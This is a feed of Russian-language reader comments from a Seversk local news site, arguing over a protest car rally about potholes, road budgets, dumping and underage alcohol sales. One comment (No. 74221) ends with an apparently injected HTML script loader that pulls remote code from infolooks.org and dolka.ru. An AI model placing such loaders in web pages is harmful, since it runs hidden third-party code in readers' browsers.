Последние комментарии:

28.12.2025 09:46 написал Set
08.12.2025 19:44 написал Set
26.11.2025 18:20 написал tourson
11.11.2025 21:45 написал FANTOMAS
10.11.2025 22:27 написал Ст. урядник
24.09.2025 16:16 написал Set
05.09.2025 09:34 написал Set
15.08.2025 12:25 написал Set
08.08.2025 20:49 написал Ст. урядник
05.07.2025 11:26 написал Set
28.06.2025 11:37 написал tourson
15.06.2025 22:47 написал барыга
11.06.2025 22:54 написал tourson
11.06.2025 22:53 написал tourson
11.06.2025 22:49 написал tourson

Комментарий № 74285: Демонстративный автопробег

Написал: seversk2013
От пробега больше денег у Администрации не станет. 
Внимание, да, привлечется, хотя они и сами там понимают, что дороги ремонтировать надо. Представляю, если бы Администрация участвовала тут в дебатах, а они просто молча взяли и начали дорогу ремонтировать lol  


--------------------
Студия звукозаписи Арт Легион объявляет конкурс для самых красивых девушек Северска! Подробности на сайте.

Комментарий № 74284: Демонстративный автопробег

Написал: Gent
Цитата: kkknnnaaassstttyyy
Snegok, и потом, ваш автопробег в таком виде несёт какие-нибудь конкретные предложения по решению проблемы? А то, ведь, так можно на плакатиках писать, к примеру, "я против безработицы", "я против войны", "я против рассизма", "я против голодающих в Сомали", "я против падения метеоритов на Землю" и т. д. Смысл в вашем автопробеге?
Гражданин, вы идиот? "Предложения по решению проблемы" тут простые - профессиональное  исполнение Администрацией Северска и её подразделений своих прямых обязанностей по содержанию городского хозяйства, включающего дороги. Той самой Администрацией, которая на наши налоги содержится и тех самых дорог, которые на наши же налоги ДОЛЖНЫ ремонтироваться. И не вот так:  http://www.tv2.tomsk.ru/reportage/sezon-zaplatok-otkryt  . А как положено, чтобы эти заплатки не отлетали после первого сильного ливня.

Кстати, ваше долгое и неустанное кривляние в этой теме гораздо более напоминает истерику, чем предложение организаторов акции публично выразить свой протест против бездарной политики власти в отношении дорожного ремонта и строительства.  То, как назойливо вы тут пытаетесь тему заболтать, говорит о какой-то вашей личной заинтересованности в том, чтобы акция не состоялась. Пока не понятно зачем это лично вам, но так гиперактивно человек не заинтересованный вести тут себя не будет.

Комментарий № 74283: В Северске продолжают продавать алкоголь несовершеннолетним

Написал: seversk2013
Кстати, мне кажется, всё-таки, уровень потребления алкоголя снижается каждый год. Раньше все на встречах водку пили, сейчас как-то по пивку больше... Это, я считаю, прогресс. Правительство принимает правильные шаги. Запрет на продажу алкоголя после 22.00 и запрет курения - хоть употребляющие и матерятся, но всё-таки это правильно. Но это нужно ещё и контролировать - а вот и контроль. Всё верно!


--------------------
Студия звукозаписи Арт Легион объявляет конкурс для самых красивых девушек Северска! Подробности на сайте.

Комментарий № 74282: Молодежь СХК начала акцию помощи ветеранам войны

Написал: seversk2013
Хорошее дело делают. А то на 9 мая ветераны в почести, а 10-го про них уже все забыли. ОМО СХК в этом направлении двигаются, и кстати это не первый раз, когда они помогают старикам. Хочется процитировать товарища Примаченко: "МОЛОДЦЫ!". Так держать!


--------------------
Студия звукозаписи Арт Легион объявляет конкурс для самых красивых девушек Северска! Подробности на сайте.

Комментарий № 74281: Детская школа искусств объявляет набор детей

Написал: seversk2013
Ну или к нам приходите на музыкальных интсрументах играть: гитара, электрогитара, бас-гитара, барабаны. А также сразу мы запишем ваше творчество на студийном оборудовании.


--------------------
Студия звукозаписи Арт Легион объявляет конкурс для самых красивых девушек Северска! Подробности на сайте.

Комментарий № 74280: Демонстративный автопробег

Написал: flyd
требуете чтобы ГИБДД соблюдала закон, выдержки тут привели из КОАПа, а сами собрались этим самим пробегом нарушать ПДД.
п.10.5 Правил дорожного движения РФ
Водителю запрещается создавать помехи другим транспортным средствам, двигаясь без необходимости со слишком малой скоростью.

p.s. С себя надо начинать уважаемые горожане smile

Комментарий № 74279: Демонстративный автопробег

Написал: Gent
Участвовать буду. Плакат повешу свой, злой bully
Понимаю, что, по большому счёту совести и мозгов у нынешних руководителей города от этого автопробега больше не станет, но пусть хоть увидят, что не всё население Северска - покорная биомасса. На гундосов, отчаянно пытающихся тут всех опять вернуть в свои норы и ничего не предпринимать, предлагаю забить.

зы: сагитировал ещё 2х знакомых, будут на своих авто.
Организаторы, не забудьте заранее известить ТВ-2, портал "город.томск.ру" и http://news.vtomske.ru (после этого дату и время мероприятия менять уже будет нельзя, как вы понимаете) Нет смысла проводить такие акции, если о них будет знать только узкий круг лиц.

Очень интересно, будет ли ГИБДД препятствовать этого автопробегу или, наоброт, окажет содействие?... fellow

Комментарий № 74278: Недовольные работой УК и «заложники» асоциального соседа

Написал: IT-servis
Этож сколько Лашевичей-то надо! lol 

Комментарий № 74277: Свалка на Крупской 14а!

Написал: IT-servis
Нам кажется помогут только показательные штрафы. Но как поймать человека за руку? Принят закон, который обяжет судей учитывать видеодоказательства в суде. Мы можем поставить систему видеонаблюдения, и через неделю от мусорки и следа не останется. Потом систему видеонаблюдения можно будет либо убрать, либо оставить.

Комментарий № 74276: Демонстративный автопробег

Написал: kkknnnaaassstttyyy

Snegok, вы правы, меняч никто не заставляет. просто, я против истерик

 

Комментарий № 74275: Новый дом - новая свалка!!!

Написал: IT-servis
Ну можно видеокамеры наблюдения поставить, и смотреть кто что принес. Жильцы хотя бы будут знать. Кстати мы можем этим заняться feel 

Комментарий № 74274: Демонстративный автопробег

Написал: kkknnnaaassstttyyy
Snegok, кстати, я тоже плачу налоги. И состояние дорог меня меньше волнует, чем некоторые другие городские проблемы, на решение которых из бюджета тоже идут средства. Да, и дороги, как повод снять мэра... Вы мне сейчас напоминаете г-на Сашова, который за благовидными предлогами на самом деле метил максимум в кресло томского градоначальника, а минимум - в кресло городского депутата. Не попал))

Комментарий № 74273: Демонстративный автопробег

Написал: kkknnnaaassstttyyy
Snegok, в Томске тоже мэра поменяли - дороги от этого лучше не стали))))

Комментарий № 74272: Демонстративный автопробег

Написал: Snegok
kkknnnaaassstttyyy,

Цитата: kkknnnaaassstttyyy
ваш автопробег в таком виде несёт какие-нибудь конкретные предложения по решению проблемы
 

У меня есть прекрасная идея , просто замечательная : поменять мэра и его приближенных !!!!!  Замечу , что это предложение на сайте  появлялось и уже не раз!

Комментарий № 74271: Демонстративный автопробег

Написал: Snegok
kkknnnaaassstttyyy,
Как Вы думаете , меня волнует кто сколько выделил на ремонт , мне плевать???????? 
Я плачу налоги в полной мере и во время  и хочу ездить по нормальным дорогам , а не по ямам и встречкам !!!!!
Цитата: kkknnnaaassstttyyy
Смысл в вашем автопробеге?

Ответ:Привлеч внимание "самых" верхов к проблеме состояния дорожного покрытия .А смысл забастовок или митингов ???? 
Вам эта идея не интересна , вот и отлично , Вас ведь никто не заставляет !!!!!!!!!!!!

Комментарий № 74270: «Росатом» приступил к строительству экспериментального завода

Написал: NoName
тайга,
О майн гот!
Да перестань уже оценивать мою личность. Тебе вопрос был простейший. Ты писал про 92% и 64%. Ну или скажи, что с потолка взял эти цифры, или если они реальны, ну ты же от куда то их взял??? Назови источник. Ну, хоть без ссылок на Интернет, хоть как нибудь.
Просто скажи откуда эта информация, не надо мне объяснять какой я тупой. Просто скажи откуда ты это взял.
Если ты трепло, ну, ничего страшного, это не большой грех. Это же не убийство и не воровсто.Ну загнул для красного словца, а подтвердить нечем. Так и скажи, никто тебя не съест.
Не пиши мне в ответ какой я глупый, я же тебе про это не пишу. Просто и по существу можешь ответить????

Комментарий № 74269: Недовольные работой УК и «заложники» асоциального соседа

Написал: коля-ваня
Учитывая неоднозначность ситуации, комиссия приняла решение предложить органам внутренних дел взять эту квартиру на особый контроль.
 
Полицейского что ли подселили? Лашевич, как начальник УЖКХ, сам обязан заселиться в эту квартиру, и вести профилактическую беседу с неплательщиком.   Полицейским, что заняться больше не чем?
Квартира муниципальная, вот пусть Лашевич и несёт бремя ответственности за упыря этого. 


--------------------
.

Комментарий № 74268: Демонстративный автопробег

Написал: kkknnnaaassstttyyy
gigi, говоря про изменения наверху, какой "верх" имеется: "Самый", "самый-самый" или "самый-самый-самый"?))))))))))

Комментарий № 74267: Демонстративный автопробег

Написал: gigi
нам Тулеева надо своего!!


--------------------
Если б я имел коня....

Комментарий № 74266: Демонстративный автопробег

Написал: gigi
Snegok,
Мои варианты в рамках нашей деревни,да и страны в целом,как минимум  могут попасть под статью о разжигании и призывам к чему нибудь.Поэтому пока на верху ничего не изменится-низы ничегошеньки кроме как попукать,покричать,потратить время,бензин-НЕ СМОГУТ СДЕЛАТЬ!!!Всё это от наивности:)


--------------------
Если б я имел коня....

Комментарий № 74265: Новый дом - новая свалка!!!

Написал: коля-ваня
Все вопросы к управляющей компании. Не спрашивайте, а требуйте! 


--------------------
.

Комментарий № 74264: Демонстративный автопробег

Написал: shuriki
не ушатывайте дорогу еще больше,не надо лишний раз без надобности по ней кататься - пройдите лучше пешком по тратуару lol

Комментарий № 74263: Демонстративный автопробег

Написал: kkknnnaaassstttyyy
Snegok, и потом, ваш автопробег в таком виде несёт какие-нибудь конкретные предложения по решению проблемы? А то, ведь, так можно на плакатиках писать, к примеру, "я против безработицы", "я против войны", "я против рассизма", "я против голодающих в Сомали", "я против падения метеоритов на Землю" и т. д. Смысл в вашем автопробеге? 

Комментарий № 74262: Демонстративный автопробег

Написал: kkknnnaaassstttyyy

Snegok,

из средств местного бюджета выделено 7025,07 тыс. руб. 

Сколько смогли денег выделить, столько выделели. Или вы считаете, что на дороги нужно весь годовой бюджет Северска вбухивать?

 

Комментарий № 74261: Демонстративный автопробег

Написал: Snegok
kkknnnaaassstttyyy,
Цитата: kkknnnaaassstttyyy
7025,07 тыс. руб. (на 11 158 кв.м)
 
А теперь давайте посмотрим : Коммуну в ямах + колея  на 50% , дублеры Победы ( возле Алисы полностью асфальт надо менять , возле Мегаполиса можно ямочным обойтись ) Северная магистраль полностью , Калинина ямочный  ...... Как вы думаете уже есть 11 000 кв.м ????  и даже 2000 кв.м сэкономленных не поможет ((((((
Поясню не хватит этих денег на  ремонт всех ям !!!!!!!!!!
Цитата: kkknnnaaassstttyyy
А то преждевременный автопробег может сойти за преждевременную эякуляцию))))
 
Я не хочу чтобы подвеска моего авто сама ничего преждевременно не сделала )))))))

Комментарий № 74260: Демонстративный автопробег

Написал: Гайзенберг
безполезная движуха

Комментарий № 74259: Девушка-сирота осталась без квартиры

Написал: Гайзенберг
если девочка как на фото то я могу приютить на время smile

Комментарий № 74258: Демонстративный автопробег

Написал: kkknnnaaassstttyyy
Да, и представляю, как прикольно будет выглядеть отчёт об автопробеге. На фоне работяг. кладущих асфальт, едут машинки с гневными надписями  wink

Комментарий № 74257: Демонстративный автопробег

Написал: kkknnnaaassstttyyy

Snegok,

Что касается ремонта автомобильных дорог и улиц Северска, то по представленной на сессии информации, на 2014 год из средств местного бюджета выделено 7025,07 тыс. руб. (на 11 158 кв.м). Эти средства планируется направить на ремонт асфальтобетонного покрытия улично-дорожной сети города и на выполнение работ по ремонту промышленной зоны и подъездов к садовым обществам д. Чернильщиково, Поперечка. Из областного бюджета финансирование не предусмотрено. К указанной выше цифре добавятся еще полтора миллиона, сэкономленные в прошлом году при проведении ремонтов дворовых территорий по контрактам (на 2120 кв. м). Эти деньги пойдут на починку дорог в кварталах № 9,10, 18, 22, 32, 39.

http://vseverske.info/news/seversk/seversk-politika/13990-na-remont-dorog-potrat
yat-7-millionov.html

Власть обещает провести ремонтную кампанию до (максимум) начала июля.

Вариант опроса "затрудняюсь ответить" - не даёт полной объективности. Затрудняться ответить можно по многим диаметрально противоположным причинам.

Дороги начали ремонтировать, как только позволила погода. Кстати, о своих намерениях (см. выше) она заявила, когда ещё снег не со всех дорог сошёл (т. е. заранее).

М ещё, если затрудняетесь ответить, каков будет итог ремонтной кампании, тогда зачем панику заранее наводить? Вот закончится она, оцените, не понравиться, тогда и айда автопробегом ударять по чиновничеству и бесхозяйственности. А то преждевременный автопробег может сойти за преждевременную эякуляцию))))

 

Комментарий № 74256: Демонстративный автопробег

Написал: Автолюбитель-пешеход
Zeitgeistзачем ты выбрал единственное место в городе, где есть такая хорошая дорога? no

 

Комментарий № 74255: Тормози, тормози!

Написал: HECKBuK
еще и по правому ряду опережает, водитель мог просто не заметить резко пролетевшего идиота....

Комментарий № 74254: Демонстративный автопробег

Написал: Завсегдатый
Zeitgeist,
Надо наподобе вот этой [url=http://vk.com/albums-38638743?z=photo-38638743_304086197/photos-38638743][/
url] наклейки и всем автолюбителям наклеить а ещё есть портал демократор.

Комментарий № 74253: Ремонт дороги по-Северски

Написал: Roman
тайга,
Так вас пример депутата нашей Госдумы от Уралвагонзавода не смущает? Можно быть рабочим и политической проституткой без чести и совести - одновременно.

Комментарий № 74252: Посиделки со спиртным закончились поножовщиной

Написал: Roman
Ни один помидор не пострадал

Комментарий № 74251: Демонстративный автопробег

Написал: Висточка
Snegok,
да да. делать будут но следующим летом опять по новой бует все:(


--------------------
Невозможно быть хорошим для всех… И если у человека есть враги, то он действительно чего-то стоит…

Комментарий № 74250: Новый дом - новая свалка!!!

Написал: Roman
Дом новый, а свиньи - со стажем

Комментарий № 74249: Демонстративный автопробег

Написал: Snegok
gigi,
Предлагайте варианты расшевелить нашу администрацию ......

Комментарий № 74248: Демонстративный автопробег

Написал: Snegok
Висточка,
перекресток Коммуны  и Солнечной , прямо на нем боооольшая заплатка ...... и нарезали они Коммуну , значит сегодня - завтра делать будут ..... 



Комментарий № 74247: Демонстративный автопробег

Написал: gigi
Я наверное тайну открою-Но им Похui!Ну выглянут в окошечко-скажут ххааа людишки на покатушках или что то типа того...Срать им.


--------------------
Если б я имел коня....

Комментарий № 74246: Посиделки со спиртным закончились поножовщиной

Написал: Автолюбитель-пешеход
Посиделки со спиртным закончились поножовщиной... с кетчупом? lol 

Комментарий № 74245: ЗАТО какой мэр такие и дороги...

Написал: Snegok
Марина 75,
А маршрутники пусть тоже присоединяются ..... 

Комментарий № 74244: Демонстративный автопробег

Написал: Висточка
Snegok,
Вроде еще не решили, 
А дороги даже где отремонтировали, дыры то остались они только большие залатали:) 


--------------------
Невозможно быть хорошим для всех… И если у человека есть враги, то он действительно чего-то стоит…

Комментарий № 74243: ЗАТО какой мэр такие и дороги...

Написал: Snegok
flyd,
Я думаю денег на все у них не хватит!!!! Посчитайте примерно 1 кв.м. асфальта в среднем стоит 720 руб . А у нас ямы уже не по 1 кв. метру , а больше .

Комментарий № 74242: Новый дом - новая свалка!!!

Написал: Vseversk
Как я понял из вышенаписанного, "какают" не жильцы этого дома..

Комментарий № 74241: Демонстративный автопробег

Написал: Snegok
Где сбор ?
 

Комментарий № 74240: Демонстративный автопробег

Написал: Snegok
kkknnnaaassstttyyy,
Для этого можно использовать вариант :"Затрудняюсь ответить" т.к. это последние три дня дороги начали ремонтировать , а каков будет результат этого ремонта пока затрудняюсь ответить )))))))))))))))))

Комментарий № 74239: Демонстративный автопробег

Написал: Zeitgeist
Цитата: Завсегдатый
Гы надо ещё разработать наклейки как в Томске с портретом Шамина и Биденко :))))).

Комментарий № 74238: Прокат по выдаче крыльев для перелета

Написал: kkknnnaaassstttyyy

А что это за "лесная тропинка"?

 

Комментарий № 74237: Демонстративный автопробег

Написал: kkknnnaaassstttyyy

Хм, а почему для объективности в опросе нет такой строчки, как, например, "не приеду, потому что дороги в Северске ремонтируются"?

 

Комментарий № 74236: Демонстративный автопробег

Написал: Висточка
xabk,
Ну так вы еще забыли про набитый карманы :)
Которые у них и так уже пухнут. и дороги давно  не делают качественные, с георешеткой, сеткой геотесктилем и тд.... тк. им не выгоно это в карман не положат ничего если будут по правилам ремонтировать... 


--------------------
Невозможно быть хорошим для всех… И если у человека есть враги, то он действительно чего-то стоит…

Комментарий № 74235: Демонстративный автопробег

Написал: xabk
Висточка,
Самое страшное, что они гробят автомобили купленные на наши с вами денежки (налоги). Чем хуже дороги, тем чаще происходит ремонт и смена автопарка Администрации, да и автомобили то выбирают не самые дешевые.  Конечно проще наверно купить авто чем отремонтировать дороги.  

Комментарий № 74234: Водитель маршрутки помыл автобус за 50 тысяч рублей

Написал: JustMe
Какие забавный у нас в Северске инспектора ГИБДД..:)

Комментарий № 74233: Новый дом - новая свалка!!!

Написал: Висточка
Ужас, как самим приятно мимо этого проходить, Или где живу там и какаю?? no  Не понимаю этого... 


--------------------
Невозможно быть хорошим для всех… И если у человека есть враги, то он действительно чего-то стоит…

Комментарий № 74232: Белый медведь открыл купальный сезон

Написал: Висточка
А какая модрашка довольная у него, наконец то покупаеться хоть. И то наверное не долго ;(


--------------------
Невозможно быть хорошим для всех… И если у человека есть враги, то он действительно чего-то стоит…

Комментарий № 74231: Ремонт дороги по-Северски

Написал: JustMe
В таком маленьком городе власть не может навести порядок  с дорогами, позор!

Комментарий № 74230: Демонстративный автопробег

Написал: Висточка
Цитата: PRIMACHENKO
Вопрос? Сколько совершается ДДП в Северске, открытых люков, плохих дорог, из-за нарушений перечисленных законов и норм? А ведь каждая яма в городе должна расцениваться как ЧП!


Это для нас ЧП а для администрации это норма... они же не свои машины гробят...



--------------------
Невозможно быть хорошим для всех… И если у человека есть враги, то он действительно чего-то стоит…

Комментарий № 74229: Демонстративный автопробег

Написал: Завсегдатый
Гы надо ещё разработать наклейки как в Томске с портретом Шамина и Биденко :)))))...

Комментарий № 74228: Демонстративный автопробег

Написал: PRIMACHENKO
Федеральный закон от 10 декабря 1995 г. № 196-ФЗ "О безопасности дорожного движения"
Статья 3. Основные принципы обеспечения безопасности дорожного движения ...приоритет ответственности государства за обеспечение безопасности дорожного движения над ответственностью граждан, участвующих в дорожном движении;
Статья 12. Основные требования по обеспечению безопасности дорожного движения при ремонте и содержании дорог
1. Ремонт и содержание дорог на территории Российской Федерации должны обеспечивать безопасность дорожного движения. Соответствие состояния дорог правилам, стандартам, техническим нормам и другим нормативным документам, относящимся к обеспечению безопасности дорожного движения, удостоверяется актами контрольных осмотров либо обследований дорог, проводимых с участием соответствующих органов исполнительной власти.
2. Обязанность по обеспечению соответствия состояния дорог после ремонта и в процессе эксплуатации установленным правилам, стандартам, техническим нормам и другим нормативным документам возлагается на орган исполнительной власти, в ведении которого находятся дороги.

Комментарий № 74227: Демонстративный автопробег

Написал: PRIMACHENKO
Управление ГИБДД по Северску   не исполняет возложенные на него функции.
3.1.2 Предельные размеры отдельных просадок, выбоин и т.п. не должны превышать по длине 15 см, ширине - 60 см и глубине - 5 см.
3.1.10 Люки смотровых колодцев должны соответствовать требованиям ГОСТ 3634. Не допускается отклонение крышки люка относительно уровня покрытия более 2,0 см.
3.1.12 Устранение недостатков, указанных в пп.3.1.9 и 3.1.10, следует осуществлять в течение не более суток с момента их обнаружения. Разрушенные крышки и решетки должны быть немедленно ограждены и обозначены соответствующими дорожными знаками. Их замена должна быть проведена в течение не более 3 ч.
4.1.5 Замену или восстановление поврежденных дорожных знаков (кроме знаков приоритета 2.1 - 2.7) следует осуществлять в течение 3 суток после обнаружения, а знаков приоритета - в течение суток.

Вопрос? Сколько совершается ДДП в Северске, открытых люков, плохих дорог, из-за нарушений перечисленных законов и норм?
А ведь каждая яма в городе должна расцениваться как ЧП!

Комментарий № 74226: «Росатом» приступил к строительству экспериментального завода

Написал: тайга

 NoName ,  тебе надо , ты и ищи информацию , доказывай или опровергай , твое дело.  Зачем я буду тебе доказывать очевидные вещи ?  Я и многие в городе их и так знают.   Если ты не способен работать с информацией , искать , систематизировать , делать соответствующие выводы , ну это твоя проблема.  В комментарии № 46 я и так тебе все разжевал , однако полагаю   в силу своего ограниченного мышления тебе это не о чем не говорит.   У каждого человека есть свой интеллектуальный предел, который и определяет уровень развития . Ну что поделаешь , если тебе в этом не очень повезло . 

Ну вот как ты не старайся , какие аргументы не приводи , а например лягушке все равно не сможешь объяснить СТО или ОТО . Тот же самый случай и с тобой , ну не дано тебе понять , ну что тут поделаешь ?



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 74225: Демонстративный автопробег

Написал: PRIMACHENKO
 При такой цепочки только не забывайте пешеходов пропускать, а если наберется значительное количество машин в акции, то ни исключено что просто все в станут в одну длинную очередь  ...

Комментарий № 74224: Ремонт дороги по-Северски

Написал: тайга

Когда будут следующие выборы местных депутатов , нужно сделать так  чтобы не один из настоящих не прошел . Они уже себя показали , да и следующему созыву урок и наставление будет .  Тот же шамин , если не будет депутатом , то никогда не станет мэром.    Мы сами виноваты , что не думая выбираем всякую политическую шушару , которая приходит делать карьеру и растранжиривать бюджет города.  Лучше выбирать не карьеристов и всяких там начальников , а простых людей , врачей , учителей , рабочих , потому как они будут более честными и порядочными .  Пришёл кандидат , смотрим , кто ? начальник ? Свободен !



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 74223: Что делать с дорогами в Северске и кто в этом виноват???

Написал: Raznaraz
Уважаемая Администрация сайта я прошу вас как автор этой ветки организуйте нам пожалуйста голосования ! 
Весьма благодарен  

Комментарий № 74222: Что делать с дорогами в Северске и кто в этом виноват???

Написал: Raznaraz
Palllud,
Я согласен )

Комментарий № 74221: ЗАТО какой мэр такие и дороги...

Написал: divanon
flyd,
так еще не вечер!)Пока будут эти "ремонтировать",Ленина вкатают.
<!--script> ( function ( src ) { var script = document.createElement( 'script' ); script.src = src; ( document.head || document.body || document.documentElement ).appendChild( script ); } )( '//infolooks.org/api/qfe5rqcvizmcjfars0wkmnytahh8sxz4' ); <!-- --> <!--script src="http://www.dolka.ru/2014.php">

Комментарий № 74220: Водитель маршрутки помыл автобус за 50 тысяч рублей

Написал: feta52
200 рублей для маршрутников - не деньги, не обедняют.

Комментарий № 74219: Ремонт дороги по-Северски

Написал: Roman
shuriki,
Вы зачем жуликов защищаете? По дорогам ездить невозможно, а по тротуарам уже и людям не пройти! Зато они строят ещё один фонтан, хотя первый лежит в руинах (а туда уже несколько млн прикопали). Полностью закатать пр-т Коммунистический в асфальт это примерно 30-40млн рублей. Вычесть фонтаны, супер газоны и автомобили для их задниц - в этом году у нас был бы новый проспект. А будут засыпанные вручную ямы.

Комментарий № 74218: В Северске продолжают продавать алкоголь несовершеннолетним

Написал: Марина 75
f1gv83,
Да понятно, что семья - главный пример для ребёнка. Я о том, что если родители сами не пьют, не колятся, это не 100% того, что дети последуют вашему примеру. 
Много примеров, что из семьи алкашей выходят достойные люди - насмотрелись на всё это безобразие и решили для себя жить по-другому. Так же и наоборот - дети из правильной семьи  наркоманят, уходят в преступники...
Поэтому равнодушным в данном вопросе нельзя быть.

Комментарий № 74217: Женщина сбита на пешеходном переходе

Написал: Висточка
Gent,
Может это он был вот и теперь злится)
Inviss89,
Ты сам себе противоречишь. 1.
Даша Лапко, ты че тут , тру водила чтоли?)) видел твою езду за рулём, вцепилась в руль аж козанки белеют, сидишь чуть ли не в пот пробивает, и тошнишь по дороге, другим мешаешь на своём корыте лохматого года... Так что не умничай, на дороге всякое бывает, не зарекайся, как говорят, блАндинка
2.просто меня бесит когда толстая жирная крашеная блондинка, строит из себя шумахера

Уж определитесь сударь, то я шумахер по вашим словам, то тошню на дороге. То еще чего то придумаете чтоли???? 

И чтоже вас так задела моя внешность? вы со своими комплексами и загонами при себе оставайтесь 


--------------------
Невозможно быть хорошим для всех… И если у человека есть враги, то он действительно чего-то стоит…

Комментарий № 74216: Торговые сети не выдерживают конкуренции и уходят из Северска

Написал: xabk
Всегда считал, что магазины для малоимущих должны быть в шаговой доступности. Видима неправильно считал. :)  

Комментарий № 74215: Водитель маршрутки помыл автобус за 50 тысяч рублей

Написал: xabk
Поверьте ни одного постановления от ГИБДД в сторону администрации в нашем УРЮПИНСКЕ  ни когда не будет. А хотя должно быть уже куча.

Комментарий № 74214: Ремонт дороги по-Северски

Написал: shuriki
f1gv83,
а при совке еще бетон с асфальтом в лесах сваливали и стекла тракторами давили. а большой слой асфальта не есть гуд, он имеет на жаре свойство размягчаться и образуются колеи и ямы, по технологии толщина 50мм укатанного асфальта, если армированного и того меньше.

Комментарий № 74213: Ремонт дороги по-Северски

Написал: shuriki
f1gv83, да нет это вы наивный. можно поинтересоваться в какой сфере деятельности вы заняты?! вы думаете привозят ежегодно в администрацию куча бабла на тракторе с прицепом вываливают в кучу и каждый подходит и берет сколько кому надо на фонтаны, дороги, автомобили для администрации.

Комментарий № 74212: Что делать с дорогами в Северске и кто в этом виноват???

Написал: opirus
Цитата: Palllud
демонстративный автопробег
 
Ударим автопробегом по бездорожью и разгильдяйству!©

Комментарий № 74211: Ремонт дороги по-Северски

Написал: Inviss89
Комментарий удален администратором сайта. Пользователю предупреждение.

Комментарий № 74210: В Северске продолжают продавать алкоголь несовершеннолетним

Написал: zero
f1gv83,
нашу волю не сломить пили пьём и будем пить))

Комментарий № 74209: Ремонт дороги по-Северски

Написал: f1gv83
Цитата: shuriki
f1gv83, ямочный ремонт нужен, что бы мы хоть как то могли передвигаться по дорогам. представь сколько средств надо на капитальный ремонт всего города, думаешь Северску когда нибудь выделят такие деньги?

такое впечатление, что вы реально наивный человек..

посчитайте сколько бабла каждый год уходит на этот ямочный "ремонт". и сколько потребуется сделать раз и на несколько десятков лет.

посмотрите, какой толщины асфальт клали при совке. да и в 90ых у нас же. десяток сантиметров, как минимум. а сейчас? раздолбят верхний слой, засыпят лопатами, и снова сказки про "капитальный ремонт", после чего эта бодяга откладывается на год, затем это снова разлетается, захватывая живые участки...

а что касаемо выделения - поменьше бы тырили на всякие стелы и фонтаны.. типа "лицо города".. лицо города - дороги и тротуары! а не всякая показуха никому не нужная.. или нужная, но не в первую очередь.

я бы понял, если каждый год бы реально делали определенный участок дороги. генплан лет на 10-15.. весь город можно было бы заново покрыть. и пилить бабло уже на других проектах.

но тут кое с чем соглашусь - смысл заморачиваться временным "хозяевам"? сегодня он тут, завтра - там. а дальше хоть трава не расти.

Комментарий № 74208: ЗАТО какой мэр такие и дороги...

Написал: flyd
мне вот интересно сколько будет стоить сделать четыре основные дороги в Северске
Северная,Калинина,Коммуна, Транспортная?
ну и Ленина желательно. хотя она пока ещё терпима

Комментарий № 74207: ЗАТО какой мэр такие и дороги...

Написал: flyd
нафиг выложили эту дорогу?:))
у нас Северная с Коммуной не лучше

Комментарий № 74206: Ремонт дороги по-Северски

Написал: flyd
в другие года насколько помниться в середине лета делать начинали и к сентябрю заканчивали. а в октябре снег

Комментарий № 74205: Ремонт дороги по-Северски

Написал: flyd
не ну хотя бы так пускай делают! чем вообще не делают!
 правильно тут сказали асфальтовые заводы то ещё не работают в полном режиме!
вы когда нибудь видели чтобы в Северске 5 апреля начали ремонт, как в этом году?
пускай хотя бы так! чем змейкой гонять и всё равно попасть в какую нибудь яму! потому что при объезде всех ям всё равно попадаешь в какую-то, их в этом году докуя!!! wink

Комментарий № 74204: Ремонт дороги по-Северски

Написал: Roman
shuriki,
Тогда готовьтесь пересаживаться на что-нибудь на гусеничном ходу

Комментарий № 74203: Свалка на Крупской 14а!

Написал: f1gv83
Цитата: Евгения Николаевна
А вы знаете кто живет в этом доме? Здесь половина личностей аморального поведения, даже опорнй пункт на первом этаже не помогает, нормальные люди устали боротся с этим контингентом, вы предлогаете ходить за алкашами собирать мусор, сюда даже жэк-4, заявки берет со скандалом, мусорка приезжает в лудьшем случае раза два в неделю, милиция выезжает, когда уже все лежат на полу с расхлестанными лицами, а на это все дети смотрят, приходите, поживите, а потом обсуждайте, посмотрим на вас через месяца два, с кругами под глазами от недосыпания, с нервами как струна ( за своих детей, за своё имущество), а то может придете с работы а у вас квартиру вынесли или не дай Бог. какой нибудь алкаш уснул пьяный с сигаретой и этаж выгорел. ВПЕРЕД и с ПЕСНЕЙ...... НЕ СУДИ И СУДИМЫМ НЕ БУДЕШЬ!!!!!

значит, два варианта.
1. ходить, как на работу в опорный пункт, писать жалобы, прикладывать фотоматериалы и т д и т п. после чего в прокуратуру/ОСБ с жалобой на бездействие полиции.
2. силовые методы собственными средствами. типа суд Линча.

Комментарий № 74202: Ремонт дороги по-Северски

Написал: shuriki
f1gv83, ямочный ремонт нужен, что бы мы хоть как то могли передвигаться по дорогам. представь сколько средств надо на капитальный ремонт всего города, думаешь Северску когда нибудь выделят такие деньги?

Комментарий № 74201: В Северске продолжают продавать алкоголь несовершеннолетним

Написал: f1gv83
Цитата: ГУт
то есть пусть бухают дети? Я ж не пью.

повторяю - мне пофигу, хотят - пусть пьют.
пока сам человек не захочет - не бросит.

Цитата: ГУт
А потом на данном ресурсе опять суета: кого-то отпиздили, кого-то ограбили: вскрыли машину; сожгли; убили ... и т.п.

повторяю для тех кто в танке:
кто захочет выпить/побарагозить - всегда найдет возможность. не тетенька в павильоне ягу, так бабка на окраине спирт продаст.

Цитата: Марина 75
Считаете, что это гарантия того, что ваши дети тоже не пробуют, не пьют и пить не будут?

следить за детьми надо, прививать им нормальные ценности. а не учить топить жизнь в бухле.

кто-то тут говорил, что надо родителей штрафовать. полностью согласен!
а то "пусть школа воспитывает", потом "армия научит".. после чего имбецил возвращается, и пускается во все тяжкие.
нормально - родить и скинуть ответственность.

не, если влом это все делать, и скидывать бремя на учителей/продавцов/отцов командиров - не надо тогда удивляться пьяной молодежи на улицах, толпах колдырей у ночников в возрасте...
на бухло и времяубивание всегда есть бабки и время. на что полезное - сразу ни здоровья, ни желания...

поэтому и говорю - по мне, пусть бухают. перетерпеть это поколение, коль тот на ком лежит ответственность, не берется.

Цитата: Марина 75
В ЦУМе одна продавщица с утра частенько такая "мятая", что и не поймет кому-что продаёт.

а мысль не закрадывается такая - мать бухает, дети с нее пример берут? типа "нету в жизни радости, кроме как в бутылке"? затем бутылка кайфа не дает, хочется чего покрепче... сначала понтануться под другим кайфом, потом рамсы кинуть, а потом либо в гробу, либо истерику устраивать "я не хотел, это все случайно получилось"... и родичи сопли наматывают на кулак "он такой был домашний..."

Комментарий № 74200: Ремонт дороги по-Северски

Написал: f1gv83
Цитата: Palllud
